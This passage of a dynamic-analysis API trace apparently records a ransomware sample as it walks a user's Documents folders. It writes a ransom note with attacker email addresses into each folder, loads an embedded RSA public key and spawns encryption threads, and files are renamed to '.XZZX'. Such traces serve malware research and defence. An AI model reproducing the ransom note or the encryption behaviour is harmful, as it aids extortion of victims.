Music\\*.*" [0179.254] SetErrorMode (uMode=0x1) returned 0x1 [0179.254] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 70 [0179.254] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0179.254] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.254] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xaf8) returned 0x0 [0179.255] RegQueryValueExW (in: hKey=0xaf8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437c3d8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437c3d8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0179.255] RegCloseKey (hKey=0xaf8) returned 0x0 [0179.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.255] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf8 [0179.255] CloseHandle (hObject=0xaf8) returned 1 [0179.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.255] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.255] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.255] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0179.255] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0179.255] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0179.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0179.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0179.255] SetErrorMode (uMode=0x1) returned 0x1 [0179.256] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0179.256] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0179.256] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0179.256] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0179.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.256] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.256] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0179.256] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0179.256] SetErrorMode (uMode=0x1) returned 0x1 [0179.256] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 73 [0179.256] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0179.256] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.256] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xaf8) returned 0x0 [0179.256] RegQueryValueExW (in: hKey=0xaf8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437c608, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437c608*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0179.257] RegCloseKey (hKey=0xaf8) returned 0x0 [0179.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.257] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf8 [0179.257] CloseHandle (hObject=0xaf8) returned 1 [0179.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.257] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.257] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.257] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0179.257] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0179.257] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0179.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0179.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0179.257] SetErrorMode (uMode=0x1) returned 0x1 [0179.257] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0179.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.258] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0179.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0179.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0179.258] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0179.258] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.258] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.258] lstrcmpW (lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpString2="..") returned 1 [0179.258] lstrcmpW (lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpString2=".") returned 1 [0179.258] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.258] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntldr") returned 0x0 [0179.258] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTLDR") returned 0x0 [0179.258] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0179.258] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntdetect.com") returned 0x0 [0179.258] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0179.258] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") [0179.258] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.258] lstrcpyW (in: lpString1=0x17be7c, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0179.258] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.259] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xafc [0179.259] Sleep (dwMilliseconds=0x96) [0179.405] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.405] lstrcmpW (lpString1="Favorites.vss", lpString2="..") returned 1 [0179.405] lstrcmpW (lpString1="Favorites.vss", lpString2=".") returned 1 [0179.405] StrStrW (lpFirst="Favorites.vss", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.405] StrStrW (lpFirst="Favorites.vss", lpSrch="ntldr") returned 0x0 [0179.405] StrStrW (lpFirst="Favorites.vss", lpSrch="NTLDR") returned 0x0 [0179.405] StrStrW (lpFirst="Favorites.vss", lpSrch="NTDETECT.COM") returned 0x0 [0179.405] StrStrW (lpFirst="Favorites.vss", lpSrch="ntdetect.com") returned 0x0 [0179.405] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0179.405] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") [0179.406] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.406] lstrcpyW (in: lpString1=0x17be7c, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0179.406] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb00 [0179.406] Sleep (dwMilliseconds=0x96) [0179.561] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.561] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0179.561] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0179.561] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0179.562] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.562] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0179.562] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0179.562] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0179.562] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0179.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0179.562] SetErrorMode (uMode=0x1) returned 0x1 [0179.562] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT") returned 71 [0179.563] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0179.563] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.564] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb08) returned 0x0 [0179.564] RegQueryValueExW (in: hKey=0xb08, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437c838, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437c838*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0179.564] RegCloseKey (hKey=0xb08) returned 0x0 [0179.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.564] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb08 [0179.564] CloseHandle (hObject=0xb08) returned 1 [0179.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0179.564] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0179.564] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0179.564] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0179.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.565] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.565] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.565] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.565] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.565] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.565] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.565] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0179.565] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0179.565] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0179.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0179.565] SetErrorMode (uMode=0x1) returned 0x1 [0179.565] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0179.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0179.565] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0179.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0179.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0179.565] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0179.566] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0179.566] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.566] FindNextFileW 